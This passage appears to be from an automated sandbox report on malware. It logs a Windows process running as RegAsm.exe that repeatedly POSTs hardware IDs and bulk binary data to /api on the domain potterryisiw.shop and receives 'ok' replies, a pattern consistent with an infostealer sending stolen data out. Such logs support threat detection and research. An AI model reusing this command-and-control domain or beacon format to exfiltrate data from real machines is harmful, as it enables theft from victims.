      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2eKOvrRrAyznRiYvGvMiol%2FhwJj8XiNbsdnDkAxcOM32k8pqkmbbJkq7ONULFJWqpmkL3QR82WyPDJKMCysJMNy8jZqro%2B5sM7EgR2nlxBF8cak82rm7jDlilLfY2zB0Ps3aZA%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 89c4a740ba544337-EWR
      alt-svc: h3=":443"; ma=86400
      2024-07-01 07:23:54 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
      Data Ascii: eok 8.46.123.33
      2024-07-01 07:23:54 UTC5INData Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      4192.168.2.549711188.114.96.34436176C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      TimestampBytes transferredDirectionData
      2024-07-01 07:23:55 UTC283OUTPOST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 20573
      Host: potterryisiw.shop
      2024-07-01 07:23:55 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 37 42 41 38 37 45 37 46 45 41 34 34 30 39 44 36 34 46 46 38 38 30 36 39 44 38 38 34 39 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75
      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C47BA87E7FEA4409D64FF88069D88493--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl--defau
      2024-07-01 07:23:55 UTC5242OUTData Raw: b5 5a 3e 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii: Z>56vMMZh'F3Wun 4F([:7s~X`nO
      2024-07-01 07:23:56 UTC800INHTTP/1.1 200 OK
      Date: Mon, 01 Jul 2024 07:23:56 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      Set-Cookie: PHPSESSID=nuib3b3nuss1tgi2licd5e4egn; expires=Fri, 25-Oct-2024 01:10:34 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QOPuhmm7KYpYZUGenBD%2FKU2fpjO0znh21qHjoBJuosYK14R8TOIooxawmw1odCtzGeMhqmTANaZTtCiAHNTo9Ya7zbWmkq0E9SvFjNQH5KUDhUN6uAxQOBTFJtE9e6nMi1bPrQ%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 89c4a747abf6431b-EWR
      alt-svc: h3=":443"; ma=86400
      2024-07-01 07:23:56 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
      Data Ascii: eok 8.46.123.33
      2024-07-01 07:23:56 UTC5INData Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      5192.168.2.549714188.114.96.34436176C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      TimestampBytes transferredDirectionData
      2024-07-01 07:23:56 UTC282OUTPOST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 3806
      Host: potterryisiw.shop
      2024-07-01 07:23:56 UTC3806OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 37 42 41 38 37 45 37 46 45 41 34 34 30 39 44 36 34 46 46 38 38 30 36 39 44 38 38 34 39 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75
      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C47BA87E7FEA4409D64FF88069D88493--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl--defau
      2024-07-01 07:23:57 UTC806INHTTP/1.1 200 OK
      Date: Mon, 01 Jul 2024 07:23:57 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      Set-Cookie: PHPSESSID=7p5kbo9fmj0gko3phh16n8abne; expires=Fri, 25-Oct-2024 01:10:36 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kk7cyAKVHQwmI%2FEeaQcbkO97FVxsyZ3VK%2FfgeO5DhhLxGSuP%2F%2FRwkZOTu6s84S7wdAUKsiH0AdYu179JxwoE7GuRTI00uiV7632om5YYAEnR2JGbn3c2M3oZ6pomOgikx2ssHw%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 89c4a7506b3a7c90-EWR
      alt-svc: h3=":443"; ma=86400
      2024-07-01 07:23:57 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
      Data Ascii: eok 8.46.123.33
      2024-07-01 07:23:57 UTC5INData Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      6192.168.2.549716188.114.96.34436176C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      TimestampBytes transferredDirectionData
      2024-07-01 07:23:57 UTC282OUTPOST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 1299
      Host: potterryisiw.shop
      2024-07-01 07:23:57 UTC1299OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 37 42 41 38 37 45 37 46 45 41 34 34 30 39 44 36 34 46 46 38 38 30 36 39 44 38 38 34 39 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75
      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C47BA87E7FEA4409D64FF88069D88493--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl--defau
      2024-07-01 07:23:58 UTC812INHTTP/1.1 200 OK
      Date: Mon, 01 Jul 2024 07:23:58 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      Set-Cookie: PHPSESSID=226h9epvd9uc462dpfgga41b1t; expires=Fri, 25-Oct-2024 01:10:37 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zd7sEjK7jxrAJ2Doy6KhbWPCJtQweU1iApgc%2BJd%2BrnsEW%2BF9wzMTlOyOhWwc3CbvXC4NdL4j%2BJVHzlA68pUM4Buwi5Ns2KTI8X3saJbOGDaxrLCVmDzQUq%2B%2F3qf6IMzEmOwO%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 89c4a755d82d42fe-EWR
      alt-svc: h3=":443"; ma=86400
      2024-07-01 07:23:58 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
      Data Ascii: eok 8.46.123.33
      2024-07-01 07:23:58 UTC5INData Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      7192.168.2.549719188.114.96.34436176C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      TimestampBytes transferredDirectionData
      2024-07-01 07:23:59 UTC284OUTPOST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 546185
      Host: potterryisiw.shop
      2024-07-01 07:23:59 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 37 42 41 38 37 45 37 46 45 41 34 34 30 39 44 36 34 46 46 38 38 30 36 39 44 38 38 34 39 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75
      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C47BA87E7FEA4409D64FF88069D88493--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl--defau
      2024-07-01 07:23:59 UTC15331OUTData Raw: 88 11 48 fc ac 93 ce 31 9b c6 a4 00 df 66 15 48 91 8e ee e5 1b 44 b5 52 ac ff 04 e9 ca 15 fd f3 62 4f a9 f7 b5 c9 2d 85 70 a4 2a 7f d2 51 75 2b 3b 46 23 ea 42 04 3c 46 9c 37 98 65 51 e2 4f 99 c2 e6 91 41 de 94 6e 03 6d 8e ca 0c 5a 80 79 d6 8e 5b 87 cb 63 56 f6 e1 4f b4 12 50 93 ef c3 10 19 98 95 c2 65 24 e0 b7 fe 4d f8 79 fc ad 09 51 56 f1 ef 09 a6 53 95 7e 0d e9 6a 30 10 2c 77 37 e0 c5 46 da 8d 80 24 77 a0 f4 78 05 6f ad b1 ea 76 ee 6b 83 de 43 3f 6b 5c 09 38 a4 30 17 7e 03 0d 43 32 53 2d 15 43 04 ab 51 0d 5f 64 e7 52 53 32 01 a7 ec b8 cc f7 16 56 bd dc ff 9b e0 bf 07 b4 91 8a d3 24 40 80 a1 bd a0 53 1e e0 09 8e 09 68 b7 46 fd 99 e2 ce 75 7b 1f 21 50 7f 3a 12 7c ad e1 af e7 0f 54 57 76 8a b0 83 4e fe c3 0c 7c 2e 55 fc 52 71 9b c4 e7 73 1c 67 05 64 77 5d
      Data Ascii: H1fHDRbO-p*Qu+;F#B<F7eQOAnmZy[cVOPe$MyQVS~j0,w7F$wxovkC?k\80~C2S-CQ_dRS2V$@ShFu{!P:|TWvN|.URqsgdw]
      2024-07-01 07:23:59 UTC15331OUTData Raw: 88 e9 2a cd 58 8d 71 9d 49 0d 33 69 c6 d4 95 1c 0d 5b 44 cd 46 e2 4f 8f 7d db 5c f8 5e 2b a5 50 12 50 a0 7b dc e8 17 89 91 d5 76 26 ec 93 6f 7a c4 8c c1 62 26 74 48 27 3e 34 1c 65 10 75 18 f6 3d 43 64 61 10 1e ae 0d 73 25 c1 d6 d1 ac 4f 55 49 32 c7 3c ab 9a 09 6d 45 8c 1a e3 a3 41 07 60 45 af 8d 1f ca 86 18 27 31 ba 7d ed 34 01 10 c7 a3 c6 b5 ea a4 1d eb 42 dd 5c ad 95 ee 90 7a f6 17 29 9c 51 df a1 88 b9 53 ac df 1c ae 0f d3 eb ee 14 ca d6 55 72 0f 05 6a ec 35 3e 9e f0 04 a6 87 14 95 02 21 75 27 71 46 f2 72 83 b4 43 33 66 64 aa aa 7c 4d 3f dc 0b f5 36 88 db 14 9f dd 23 8f c5 60 86 15 35 69 ca 6b 8a e9 d5 11 41 9d c7 0d 32 a9 da 4c 67 fc aa c1 57 d6 9c 26 6b fc 1a 45 eb 3c fe 29 b5 15 7d 14 20 24 f6 cd 24 13 c4 e7 35 d7 df 09 78 ed 56 15 43 5c 94 77 37 31
      Data Ascii: *XqI3i[DFO}\^+PP{v&ozb&tH'>4eu=Cdas%OUI2<mEA`E'1}4B\z)QSUrj5>!u'qFrC3fd|M?6#`5ikA2LgW&kE<)} $$5xVC\w71
      2024-07-01 07:23:59 UTC15331OUTData Raw: 03 20 c9 96 04 0a 4b 97 d2 4a 1f a4 bb ff 20 43 99 d1 70 1d 2f 68 d1 1e 4b 3d fe 50 63 1f 2f 06 74 ec 09 c9 26 40 7b c0 d9 b6 69 04 14 63 cd 02 6d 74 f1 b1 29 73 5b 86 1e 68 65 b3 e1 2a 81 46 d1 b4 cd bd d7 e9 36 45 31 f5 61 2e 47 89 07 74 77 b4 3e 82 3f 01 a2 2b f4 52 80 71 2e a8 2d e6 51 70 e1 52 e4 6e 39 ff 84 ef f4 32 80 99 b3 40 72 be 80 93 24 ee 8a 6e a1 0e 5b 48 cc 08 f9 c0 13 16 93 fe 79 4b 8f c5 26 a6 bd 53 8c 55 d6 6f 5e 76 09 e9 14 89 70 2b 11 9d ec fa b6 05 e0 4a 6b f9 1a 5f ae 09 0f 03 11 98 f0 b5 ed a3 68 dc bc 20 cf b5 c8 42 61 b9 ac 47 d1 6e 41 f8 96 86 4b de 4e e5 2c a2 1f da 1f 05 4a e7 d0 9d c3 2b 8e 4f 06 87 c3 50 a4 f4 1d 62 ef b6 34 9b 36 bf d9 c3 77 70 ee 36 c6 8a 62 e4 16 23 1d c9 d9 52 4f 7a d9 fe 72 0f 0e ca eb e8 cf 1d 4e f2 64
      Data Ascii: KJ Cp/hK=Pc/t&@{icmt)s[he*F6E1a.Gtw>?+Rq.-QpRn92@r$n[HyK&SUo^vp+Jk_h BaGnAKN,J+OPb46wp6b#ROzrNd
      2024-07-01 07:23:59 UTC15331OUTData Raw: dc a0 77 5b fe 54 8f e2 27 bf 45 1d b1 b3 ed 3f 92 50 41 96 6e 5c 26 78 2e 08 e3 fe 2d 71 cf f2 e6 c0 b1 8d 19 d2 44 f4 c5 fb 95 c0 30 e2 c7 4b ff 21 ac ee 99 d2 a7 dc fb 0a 13 40 81 c6 0d 6b d3 6b d8 ad db 5c 1c f7 8e 6e bf df f4 52 65 78 e5 02 86 25 ba 46 0c 48 1d e7 95 56 0d 51 38 20 29 a0 7c 97 a7 b3 ff 23 36 d4 46 92 af ab f3 e1 2d 0c 5c 7a f5 46 d9 39 85 2e eb a7 1c b1 e5 bb 73 be 7e 2f 08 50 c4 c2 f2 02 d8 19 11 50 66 d5 52 c4 b8 e1 cf ff bf 94 52 07 e1 81 8d fe 58 f8 2f 28 b0 14 0d 67 98 3b cb d2 07 e9 39 54 91 19 08 23 c0 7f fe ea 09 55 97 9a f3 0f bf 69 7c b8 71 83 cf 9b d2 87 c6 08 82 15 ea c2 05 15 3f 36 b4 80 18 fc 84 15 45 7c 9e 63 d9 97 38 86 05 94 69 12 26 8c aa ff 4d c7 50 31 e1 98 b0 a2 67 fc 92 ab 09 15 ec 12 cc 11 07 aa 0e ce d2 0e 6e
      Data Ascii: w[T'E?PAn\&x.-qD0K!@kk\nRex%FHVQ8 )|#6F-\zF9.s~/PPfRRX/(g;9T#Ui|q?6E|c8i&MP1gn
      2024-07-01 07:23:59 UTC15331OUTData Raw: 16 ef 76 ee f1 ba ff 01 9d 85 2b 4f 2f de f7 a7 5f 4f 45 6a 1b 7d dd 08 0e 34 f4 1f 8e 1b 42 1c e3 90 e9 43 f6 db 0d b7 5e 1c 4f 30 00 bb e6 e2 f4 15 72 17 67 3e 9a 31 11 61 ff 69 15 42 4f 7b 90 25 97 cf 75 ca ba b2 4a 0f 6c c6 1e b3 83 fd f8 32 d9 26 71 e2 08 09 eb 79 0c 63 22 53 d7 4d e9 a6 0d b2 f9 a7 32 2d 88 59 f5 11 93 7c ac f6 83 6b 39 80 d0 6a d1 4e 15 a0 f4 df 2a d8 c0 f2 e2 64 6a d2 6a 75 fd 50 37 c3 88 19 17 78 8c c6 45 9f 4a 9b 81 94 4a b4 95 28 05 dc 3b b5 08 34 03 e9 a6 14 33 c6 f6 74 b3 83 f8 c6 cd 90 9a c6 5b 4e 82 07 d7 23 4e c9 8c 66 1d c2 a0 c0 91 37 aa 2b e5 2f df d6 da 1e 32 0a c4 ed 33 2d 37 b5 34 35 cd 32 22 29 09 64 b9 24 b9 db 12 8d 5a 63 02 96 e3 bf 66 78 67 b6 94 a1 27 9f 1c 10 51 bf f7 f9 76 9d 14 2d e2 1f 7e 14 a9 ba 21 58 f2
      Data Ascii: v+O/_OEj}4BC^O0rg>1aiBO{%uJl2&qyc"SM2-Y|k9jN*djjuP7xEJJ(;43t[N#Nf7+/23-7452")d$Zcfxg'Qv-~!X
      2024-07-01 07:23:59 UTC15331OUTData Raw: a4 ce 30 38 9d 8a ed d9 bf 2f cf 4b 3f 9b 7a c6 9d 77 3a d5 64 70 e6 24 d1 94 68 1e 53 38 c1 88 81 03 b9 13 38 72 e0 f3 e8 ff c4 48 2d 44 eb 95 a1 39 9f db 99 f2 5c 1b fd 53 0f b5 01 61 de 61 a0 29 91 ae 67 e1 a7 8b 37 d1 7e b0 59 f8 6a 51 1e 8d 7d 2c c6 b4 88 1c 5a 0b 11 f2 0b de 7d af 8b c3 b8 5b 17 e8 7b 06 9c cd 28 ce 86 a0 9a 9f d4 b0 9f 37 e6 f8 a5 3a 25 ff a7 a9 fa 7f 85 39 07 f5 81 1b d7 86 e0 6f 21 1b 41 66 3c b0 39 54 20 ee f0 e0 4b c6 17 ba 9c 12 8d 77 e3 e2 31 aa 1a 50 85 85 70 47 e4 ed 11 c5 fd ba b9 7f 1d 29 7d eb a4 eb 07 eb 94 6c 36 c5 81 da e9 cf 29 2f 1e 91 4c 0d 90 54 2f fe bd bf 95 36 22 7f 60 3b 8d f2 ae 39 26 7b 52 c3 c8 70 6d 3d d8 e7 be a6 32 ea ad ed b7 2b 09 67 71 18 6b ae 3b 85 32 cd 29 fb 28 21 45 2e 9f 82 a5 24 df 38 24 9c 71
      Data Ascii: 08/K?zw:dp$hS88rH-D9\Saa)g7~YjQ},Z}[{(7:%9o!Af<9T Kw1PpG)}l6)/LT/6"`;9&{Rpm=2+gqk;2)(!E.$8$q
      2024-07-01 07:23:59 UTC15331OUTData Raw: ba 8c 62 83 bd 05 cd bd 24 5a 6b bd d4 90 a1 17 5b c3 83 89 fa 44 82 da 2c 1e f3 51 73 db 8b af 20 0d 6a fe 17 8b 8c e8 17 71 5c cb cc 15 28 74 a0 1d a6 e9 60 9b f5 b1 77 94 b9 60 eb be 7b 56 2b 5c ee 96 13 da f8 9f b7 6e 14 4e a8 9c f9 79 23 af 88 45 c7 25 8d 77 08 89 a7 c6 66 73 cc a1 0c c7 d7 26 76 5c df 9c 73 68 ac f1 75 15 5b 29 32 66 c4 e9 da f6 79 4c f2 93 90 d8 19 ab a1 88 5b d8 db 73 33 35 c1 37 a8 35 15 91 fa 8c 32 f5 9c 50 f5 d2 0d b6 44 37 f9 b3 64 9e 59 65 d3 93 85 15 c3 6e df 0f b3 6c 79 d7 84 b6 43 1d 48 09 5e c2 d9 80 cc c6 68 35 9a 52 c3 8f 3e ea 1c b2 08 26 ba ba df 30 ae 8c 7d 5f 26 e2 f6 78 06 17 20 d3 20 3c fd d7 35 c2 6d a3 36 e3 85 3b e6 4c ce f0 d7 0e 23 9f be 7f e5 74 b6 32 18 fe 7b b0 bf 8e 4f 70 da 67 b4 7b 56 fe fe c6 f6 ff 76
      Data Ascii: b$Zk[D,Qs jq\(t`w`{V+\nNy#E%wfs&v\shu[)2fyL[s35752PD7dYenlyCH^h5R>&0}_&x <5m6;L#t2{Opg{Vv
      2024-07-01 07:23:59 UTC15331OUTData Raw: ef 7b af 73 c9 a7 6a 0a ed 29 aa 9b 74 43 42 9d 91 34 fa 02 dd 7d 20 dc 82 1f 0c 4e ad 6f ce 4f 25 25 f8 35 fd f2 9b 89 85 51 9f a4 f4 68 9f e3 03 0f 55 81 6e af 06 39 93 9a 5f d6 7d e4 9c 0d ad e7 77 0b 11 22 d9 d0 ba 61 54 25 29 20 b8 d5 52 b3 17 90 7f 98 d1 1e 71 b1 af 34 4c 50 04 1c 18 f4 44 c1 e1 b8 dc 60 4e 9a 0c f8 88 2f e8 3a 47 bd 5d 9c a3 f1 b2 f6 d9 ee e3 71 55 5f ff 29 86 21 7a 62 82 c2 93 a5 73 8a e0 23 fc 0d 6d 52 c7 8f e3 5b b0 95 7b a3 c3 6d ab 2e 44 46 d8 79 ee a8 16 29 21 a0 81 82 e6 f4 1d a9 a9 02 96 93 ee 10 49 33 89 9b 1a 03 8a 2c 3b 17 49 85 04 d3 b7 2f 9b ed 67 3d d0 67 df e1 01 45 ba 8b e2 2b 11 33 ea e2 02 a7 c7 68 a5 37 ef 92 82 5f f1 bf 42 21 67 9c c2 4a d1 83 2f ff 2d bd 71 e7 e1 69 13 c3 5d 40 fb 26 74 5d c4 0e 22 91 91 8a e9
      Data Ascii: {sj)tCB4} NoO%%5QhUn9_}w"aT%) Rq4LPD`N/:G]qU_)!zbs#mR[{m.DFy)!I3,;I/g=gE+3h7_B!gJ/-qi]@&t]"
      2024-07-01 07:23:59 UTC15331OUTData Raw: cd 10 c2 4e b1 13 fc 18 a1 2d 65 31 ac 0a 3e 82 28 f1 17 bc a7 f5 56 8f 1c 2b 3d e5 76 fb 1d 9d 15 aa bf 4f 09 3a dc 6f 3d 6c e0 fb d0 9c 80 4e c0 84 a8 4f ab 7b ba 6f 91 f1 66 72 0a 23 fe c6 9e 05 6b 46 68 7f 99 03 77 63 f1 b7 c5 4a 06 ac 0c 17 c6 a0 e3 83 f5 3e 79 88 7f 5a ba 97 36 d4 f8 39 38 ea 6c 62 5a d8 f6 e2 22 9c aa e9 8e 42 67 c2 08 30 9a ff 9b 59 b7 98 b7 6d 51 46 1e c3 65 5c 65 c6 92 e6 c6 61 9f ae 23 80 d0 c2 79 71 bc 0c 85 25 2e 13 91 72 07 45 7a a4 2d 8f 73 1c b2 f0 be 03 4a f7 3b 44 a4 5c 4f 0c 77 74 09 77 7b 59 04 b5 0b e0 80 b6 01 61 10 22 69 1e e2 75 94 c7 86 b9 5b 9f 7f be 79 fb 9c 19 16 13 9c df b9 7a de ff 7e 78 dd d5 1e f3 b3 a5 bd e2 4f f2 9c 44 2f f7 70 e3 3d c1 bd 96 b3 c5 7b 7d a4 14 e4 72 1f 8d 38 9e 2c 95 3f 43 32 50 2a 80 7d
      Data Ascii: N-e1>(V+=vO:o=lNO{ofr#kFhwcJ>yZ698lbZ"Bg0YmQFe\ea#yq%.rEz-sJ;D\Owtw{Ya"iu[yz~xOD/p={}r8,?C2P*}
      2024-07-01 07:24:00 UTC806INHTTP/1.1 200 OK
      Date: Mon, 01 Jul 2024 07:24:00 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      Set-Cookie: PHPSESSID=flfblkdrn29sm1i7afhhobrohv; expires=Fri, 25-Oct-2024 01:10:39 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1TYbH4WhZWO%2FFjKk3i61M8qYBiGeVlGlEsITo30bkBaf5thmjWWTu9sRaLzBdnrIG9hxj03%2F3jnDNbrrose3QZnttXZJUAfjra%2FB9R2Ys1kz3G%2FG6hKmyWoiNMnUKbNDuJCe3A%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 89c4a75fb8a50f79-EWR
      alt-svc: h3=":443"; ma=86400


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      8192.168.2.549720188.114.96.34436176C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      TimestampBytes transferredDirectionData
      2024-07-01 07:24:01 UTC265OUTPOST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 88
      Host: potterryisiw.shop
